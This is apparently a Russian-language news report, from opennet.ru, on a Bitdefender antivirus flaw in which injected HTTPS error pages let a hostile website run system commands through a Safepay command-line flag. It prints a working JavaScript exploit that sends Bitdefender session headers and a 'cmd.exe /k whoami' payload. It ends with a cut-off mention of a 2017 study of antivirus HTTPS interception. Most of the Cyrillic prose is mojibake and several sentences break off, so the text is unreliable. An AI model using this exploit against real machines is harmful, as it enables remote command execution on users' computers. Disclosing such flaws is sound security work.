ΠΠ»Π°Π΄ΠΈΠΌΠΈΡ ΠΠ°Π»Π°Π½Ρ, ΡΠΎΠ·Π΄Π°ΡΠ΅Π»Ρ Adblock Plus,
ΠΡΠΈΡΠΈΠ½Π° ΠΏΡΠΎΠ±Π»Π΅ΠΌΡ Π² ΡΠΎΠΌ, ΡΡΠΎ Π°Π½ΡΠΈΠ²ΠΈΡΡΡ Bitdefender Π²ΡΠΏΠΎΠ»Π½ΡΠ΅Ρ Π»ΠΎΠΊΠ°Π»ΡΠ½ΡΠΉ ΠΏΠ΅ΡΠ΅Ρ Π²Π°Ρ HTTPS-ΡΡΠ°ΡΠΈΠΊΠ° ΡΠ΅ΡΠ΅Π· ΠΏΠΎΠ΄ΠΌΠ΅Π½Ρ ΠΎΡΠΈΠ³ΠΈΠ½Π°Π»ΡΠ½ΠΎΠ³ΠΎ TLS-ΡΠ΅ΡΡΠΈΡΠΈΠΊΠ°ΡΠ° ΡΠ°ΠΉΡΠ°. ΠΠ° ΡΠΈΡΡΠ΅ΠΌΠ΅ ΠΊΠ»ΠΈΠ΅Π½ΡΠ° ΡΡΡΠ°Π½Π°Π²Π»ΠΈΠ²Π°Π΅ΡΡΡ Π΄ΠΎΠΏΠΎΠ»Π½ΠΈΡΠ΅Π»ΡΠ½ΡΠΉ ΠΊΠΎΡΠ½Π΅Π²ΠΎΠΉ ΡΠ΅ΡΡΠΈΡΠΈΠΊΠ°Ρ, ΠΏΠΎΠ·Π²ΠΎΠ»ΡΡΡΠΈΠΉ ΡΠΊΡΡΡΡ ΡΠ°Π±ΠΎΡΡ ΠΏΡΠΈΠΌΠ΅Π½ΡΠ΅ΠΌΠΎΠΉ ΡΠΈΡΡΠ΅ΠΌΡ ΠΈΠ½ΡΠΏΠ΅ΠΊΡΠΈΡΠΎΠ²Π°Π½ΠΈΡ ΡΡΠ°ΡΠΈΠΊΠ°. ΠΠ½ΡΠΈΠ²ΠΈΡΡΡ Π²ΠΊΠ»ΠΈΠ½ΠΈΠ²Π°Π΅ΡΡΡ Π² Π·Π°ΡΠΈΡΡΠ½Π½ΡΠΉ ΡΡΠ°ΡΠΈΠΊ ΠΈ ΠΏΠΎΠ΄ΡΡΠ°Π²Π»ΡΠ΅Ρ Π² Π½Π΅ΠΊΠΎΡΠΎΡΡΠ΅ ΡΡΡΠ°Π½ΠΈΡΡ ΡΠΎΠ±ΡΡΠ²Π΅Π½Π½ΡΠΉ JavaScript-ΠΊΠΎΠ΄ Π΄Π»Ρ ΡΠ΅Π°Π»ΠΈΠ·Π°ΡΠΈΠΈ ΡΡΠ½ΠΊΡΠΈΠΈ Safe Search, Π° Π² ΡΠ»ΡΡΠ°Π΅ ΠΏΡΠΎΠ±Π»Π΅ΠΌ Ρ ΡΠ΅ΡΡΠΈΡΠΈΠΊΠ°ΡΠΎΠΌ Π·Π°ΡΠΈΡΡΠ½Π½ΠΎΠ³ΠΎ ΡΠΎΠ΅Π΄ΠΈΠ½Π΅Π½ΠΈΡ ΠΏΠΎΠ΄ΠΌΠ΅Π½ΡΠ΅Ρ Π²ΡΠ΄Π°Π²Π°Π΅ΠΌΡΡ ΡΡΡΠ°Π½ΠΈΡΡ Ρ ΠΎΡΠΈΠ±ΠΊΠΎΠΉ Π½Π° ΡΠΎΠ±ΡΡΠ²Π΅Π½Π½ΡΡ. Π’Π°ΠΊ ΠΊΠ°ΠΊ Π½ΠΎΠ²Π°Ρ ΡΡΡΠ°Π½ΠΈΡΠ° Ρ ΠΎΡΠΈΠ±ΠΊΠΎΠΉ Π²ΡΠ΄Π°ΡΡΡΡ ΠΎΡ ΠΈΠΌΠ΅Π½ΠΈ ΠΎΡΠΊΡΡΠ²Π°Π΅ΠΌΠΎΠ³ΠΎ ΡΠ΅ΡΠ²Π΅ΡΠ°, Π΄ΡΡΠ³ΠΈΠ΅ ΡΡΡΠ°Π½ΠΈΡΡ Π΄Π°Π½Π½ΠΎΠ³ΠΎ ΡΠ΅ΡΠ²Π΅ΡΠ° ΠΈΠΌΠ΅ΡΡ ΠΏΠΎΠ»Π½ΡΠΉ Π΄ΠΎΡΡΡΠΏ ΠΊ ΡΠΎΠ΄Π΅ΡΠΆΠΈΠΌΠΎΠΌΡ, Π²ΡΡΠ°Π²Π»ΡΠ΅ΠΌΠΎΠΌΡ Bitdefender.
ΠΡΠΈ ΠΎΡΠΊΡΡΡΠΈΠΈ ΠΏΠΎΠ΄ΠΊΠΎΠ½ΡΡΠΎΠ»ΡΠ½ΠΎΠ³ΠΎ Π·Π»ΠΎΡΠΌΡΡΠ»Π΅Π½Π½ΠΈΠΊΡ ΡΠ°ΠΉΡΠ°, ΡΡΠΎΡ ΡΠ°ΠΉΡ ΠΌΠΎΠΆΠ΅Ρ ΠΎΡΠΏΡΠ°Π²ΠΈΡΡ Π·Π°ΠΏΡΠΎΡ XMLHttpRequest ΠΈ ΡΠΈΠΌΡΠ»ΠΈΡΠΎΠ²Π°ΡΡ ΠΏΡΠΈ ΠΎΡΠ²Π΅ΡΠ΅ ΠΏΡΠΎΠ±Π»Π΅ΠΌΡ Ρ HTTPS-ΡΠ΅ΡΡΠΈΡΠΈΠΊΠ°ΡΠΎΠΌ, ΡΡΠΎ ΠΏΡΠΈΠ²Π΅Π΄ΡΡ ΠΊ Π²ΠΎΠ·Π²ΡΠ°ΡΡ ΡΡΡΠ°Π½ΠΈΡΡ Ρ ΠΎΡΠΈΠ±ΠΊΠΎΠΉ, ΠΏΠΎΠ΄ΠΌΠ΅Π½ΡΠ½Π½ΠΎΠΉ Bitdefender. Π’Π°ΠΊ ΠΊΠ°ΠΊ ΡΡΡΠ°Π½ΠΈΡΠ° Ρ ΠΎΡΠΈΠ±ΠΊΠΎΠΉ ΠΎΡΠΊΡΡΡΠ° Π² ΠΊΠΎΠ½ΡΠ΅ΠΊΡΡΠ΅ Π΄ΠΎΠΌΠ΅Π½Π° Π°ΡΠ°ΠΊΡΡΡΠ΅Π³ΠΎ, ΠΎΠ½ ΠΌΠΎΠΆΠ΅Ρ ΠΏΡΠΎΡΠΈΡΠ°ΡΡ ΡΠΎΠ΄Π΅ΡΠΆΠΈΠΌΠΎΠ΅ ΠΏΠΎΠ΄ΠΌΠ΅Π½ΡΠ½Π½ΠΎΠΉ ΡΡΡΠ°Π½ΠΈΡΡ Ρ ΠΏΠ°ΡΠ°ΠΌΠ΅ΡΡΠ°ΠΌΠΈ Bitdefender. ΠΠ° ΠΏΠΎΠ΄ΡΡΠ°Π²Π»ΡΠ΅ΠΌΠΎΠΉ Bitdefender ΡΡΡΠ°Π½ΠΈΡΠ΅ Π² ΡΠΎΠΌ ΡΠΈΡΠ»Π΅ ΠΏΡΠΈΡΡΡΡΡΠ²ΡΠ΅Ρ ΡΠ΅ΡΡΠΈΠΎΠ½Π½ΡΠΉ ΠΊΠ»ΡΡ, ΠΏΠΎΠ·Π²ΠΎΠ»ΡΡΡΠΈΠΉ ΠΏΡΠΈ ΠΏΠΎΠΌΠΎΡΠΈ Π²Π½ΡΡΡΠ΅Π½Π½Π΅Π³ΠΎ API Bitdefender Π·Π°ΠΏΡΡΡΠΈΡΡ ΠΎΡΠ΄Π΅Π»ΡΠ½ΡΠΉ ΡΠ΅Π°Π½Ρ Π±ΡΠ°ΡΠ·Π΅ΡΠ° Safepay, ΡΠΊΠ°Π·Π°Π² ΠΏΡΠΈ ΡΡΠΎΠΌ ΠΏΡΠΎΠΈΠ·Π²ΠΎΠ»ΡΠ½ΡΠ΅ ΡΠ»Π°Π³ΠΈ ΠΊΠΎΠΌΠ°Π½Π΄Π½ΠΎΠΉ ΡΡΡΠΎΠΊΠΈ, ΠΈ Π΄ΠΎΠ±ΠΈΡΡΡΡ Π·Π°ΠΏΡΡΠΊΠ° Π»ΡΠ±ΡΡ ΡΠΈΡΡΠ΅ΠΌΠ½ΡΡ ΠΊΠΎΠΌΠ°Π½Π΄ ΠΏΡΠΈ ΠΏΠΎΠΌΠΎΡΠΈ ΡΠ»Π°Π³Π° «—utility-cmd-prefix». ΠΡΠΈΠΌΠ΅Ρ ΡΠΊΡΠΏΠ»ΠΎΠΈΡΠ° (param1 ΠΈ param2 — Π·Π½Π°ΡΠ΅Π½ΠΈΡ, ΠΏΠΎΠ»ΡΡΠ΅Π½Π½ΡΠ΅ ΡΠΎ ΡΡΡΠ°Π½ΠΈΡΡ Ρ ΠΎΡΠΈΠ±ΠΊΠΎΠΉ):
var request = new XMLHttpRequest();
request.open(«POST», Math.random());
request.setRequestHeader(«Content-type», «application/x-www-form-urlencoded»);
request.setRequestHeader(«BDNDSS_B67EA559F21B487F861FDA8A44F01C50», param1);
request.setRequestHeader(«BDNDCA_BBACF84D61A04F9AA66019A14B035478», param2);
request.setRequestHeader(«BDNDWB_5056E556833D49C1AF4085CB254FC242», «obk.run»);
request.setRequestHeader(«BDNDOK_4E961A95B7B44CBCA1907D3D3643370D», location.href);
request.send(«data:text/html,nada —utility-cmd-prefix=\»cmd.exe /k whoami & echo\»»);
ΠΠ°ΠΏΠΎΠΌΠ½ΠΈΠΌ, ΡΡΠΎ ΠΏΡΠΎΠ²Π΅Π΄ΡΠ½Π½ΠΎΠ΅ Π² 2017 Π³ΠΎΠ΄Ρ ΠΈΡΡΠ»Π΅Π΄ΠΎΠ²Π°Π½ΠΈΠ΅
ΠΠΊΡΡΠ°Π»ΡΠ½ΡΠ΅ Π½Π°Π±ΠΎΡΡ ΡΠΈΡΡΠΎΠ² ΠΏΡΠ΅Π΄ΠΎΡΡΠ°Π²Π»ΡΠ»ΠΈΡΡ ΡΠΎΠ»ΡΠΊΠΎ Π² 11 ΠΈΠ· 26 ΠΏΡΠΎΠ΄ΡΠΊΡΠΎΠ². 5 ΡΠΈΡΡΠ΅ΠΌ Π½Π΅ ΠΎΡΡΡΠ΅ΡΡΠ²Π»ΡΠ»ΠΈ Π²Π΅ΡΠΈΡΠΈΠΊΠ°ΡΠΈΡ ΡΠ΅ΡΡΠΈΡΠΈΠΊΠ°ΡΠΎΠ² (Kaspersky Internet Security 16 Mac, NOD32 AV 9, CYBERsitter, Net Nanny 7 Win, Net Nanny 7 Mac). ΠΡΠΎΠ΄ΡΠΊΡΡ Kaspersky Internet Security ΠΈ Total Security Π±ΡΠ»ΠΈ ΠΏΠΎΠ΄Π²Π΅ΡΠΆΠ΅Π½Ρ Π°ΡΠ°ΠΊΠ΅
ΠΡΡΠΎΡΠ½ΠΈΠΊ: opennet.ru